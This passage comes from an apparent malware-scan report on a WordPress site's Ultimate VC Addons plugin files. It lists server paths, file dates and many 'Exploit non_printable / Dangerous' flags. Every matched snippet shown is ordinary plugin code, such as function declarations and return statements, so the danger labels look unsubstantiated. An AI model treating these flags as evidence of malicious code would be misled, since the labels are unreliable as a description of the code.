<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dualbutton_backend_scripts</span><span style="color: #007700">(</span><span style="color: #0000BB">$hook</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 31</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dualbutton_scripts</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 392</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'get_ultimate_font_family'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 397</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'get_ultimate_font_style'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 58</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">stats Icon</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 59</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_dualbtn_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 609</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$mainoutput</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 693</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$subop</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 697</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_dual_button</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 699</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_333").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_buttons.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 31.70 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 9</span><br><table id="file_334" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } function </span><span style="color: #0000BB">init_buttons</span><span style="color: #007700">(){ if(</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">"vc_map"</span><span style="color: #007700">)) { </span><span style="color: #0000BB">$json </span><span style="color: #007700">= </span><span style="color: #0000BB">ultimate_get_icon_position_json</span><span style="color: #007700">(); </span><span style="color: #0000BB">vc_map</span><span style="color: #007700">( array( </span><span style="color: #DD0000">"name" </span><span style="color: #007700">=> </span><span style="color: #0000BB">__</span><span style="color: #007700">(</span><span style="color: #DD0000">"Advanced Button"</span><span style="color: #007700">, </span><span style="color: #DD0000">"ultimate_vc"</span><span style="color: #007700">), </span><span style="color: #DD0000">"base" </span><span style="color: #007700">=> </span><span style="color: #DD0000">"ult_buttons"</span><span style="color: #007700">, </span><span style="color: #DD0000">"icon" </span><span style="color: #007700">=> </span><span style="color: #DD0000">"ult_buttons"</span><span style="color: #007700">, </span><span style="color: #DD0000">"class" </span><span style="color: #007700">=> </span><span style="color: #DD0000">"ult_buttons"</span><span style="color: #007700">, </span><span style="color: #DD0000">"content</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">advanced_button_scripts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">button_admin_scripts</span><span style="color: #007700">(</span><span style="color: #0000BB">$hook</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 283</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function () {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_buttons_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 305</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 308</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">init_buttons</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 309</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">"vc_map"</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_334").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_hightlight_box.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 22.01 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 8</span><br><table id="file_335" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if(</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'Ultimate_Highlight_Box'</span><span style="color: #007700">)) { </span><span style="color: #0000BB">$Ultimate_Highlight_Box </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_Highlight_Box</span><span style="color: #007700">; } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode' </span><span style="color: #007700">) && !</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode_ultimate_ctation' </span><span style="color: #007700">) ) { class </span><span style="color: #0000BB">WPBakeryShortCode_ultimate_ctation</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_cta_assets</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ctaction_init</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 398</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">stats banner</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 399</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">call_to_action_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 539</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_335").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_carousel.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 30.40 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 20</span><br><table id="file_336" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'ultimate_restore_shortcodes' </span><span style="color: #007700">) ) { function </span><span style="color: #0000BB">ultimate_restore_shortcodes</span><span style="color: #007700">() { global </span><span style="color: #0000BB">$shortcode_tags</span><span style="color: #007700">, </span><span style="color: #0000BB">$_shortcode_tags</span><span style="color: #007700">; if ( isset( </span><span style="color: #0000BB">$_shortcode_tags </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">$shortcode_tags </span><span style="color: #007700">= </span><span style="color: #0000BB">$_shortcode_tags</span><span style="color: #007700">; } } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 19</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">custom_param_styles</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 34</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_front_scripts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_admin_scripts</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">init_carousel_addon</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 50</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">"vc_map" </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 559</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_carousel_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 767</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">slider</span><span style="color: #007700">, </span><span style="color: #0000BB">i</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 768</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return \</span><span style="color: #DD0000">'<i type="button" ' </span><span style="color: #007700">. </span><span style="color: #0000BB">$custom_dots </span><span style="color: #007700">. </span><span style="color: #DD0000">' class="' </span><span style="color: #007700">. </span><span style="color: #0000BB">esc_attr</span><span style="color: #007700">( </span><span style="color: #0000BB">$dots_icon </span><span style="color: #007700">) . </span><span style="color: #DD0000">'" data-role="none"></i>\';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 787</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function ($) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 788</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function</span><span style="color: #DD0000">"){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 794</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">ob_get_clean</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 804</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'ultimate_override_shortcodes' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 805</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_override_shortcodes</span><span style="color: #007700">( </span><span style="color: #0000BB">$item_space</span><span style="color: #007700">, </span><span style="color: #0000BB">$item_animation </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 824</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'ultimate_wrap_shortcode_in_div' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 825</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_wrap_shortcode_in_div</span><span style="color: #007700">( </span><span style="color: #0000BB">$attr</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">, </span><span style="color: #0000BB">$tag </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 828</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'<div class="ult-item-wrap" data-animation="animated ' </span><span style="color: #007700">. </span><span style="color: #0000BB">esc_attr</span><span style="color: #007700">(</span><span style="color: #0000BB">$_shortcode_tags</span><span style="color: #007700">[</span><span style="color: #DD0000">"item_animation"</span><span style="color: #007700">]) . </span><span style="color: #DD0000">'">' </span><span style="color: #007700">. </span><span style="color: #0000BB">call_user_func</span><span style="color: #007700">( </span><span style="color: #0000BB">$_shortcode_tags</span><span style="color: #007700">[ </span><span style="color: #0000BB">$tag </span><span style="color: #007700">], </span><span style="color: #0000BB">$attr</span><span style="color: #007700">, </span><span style="color: #0000BB">$content</span><span style="color: #007700">, </span><span style="color: #0000BB">$tag </span><span style="color: #007700">) . </span><span style="color: #DD0000">'</div>'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 831</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'ultimate_restore_shortcodes' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 832</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_restore_shortcodes</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_336").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_icons.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.99 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 10</span><br><table id="file_337" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
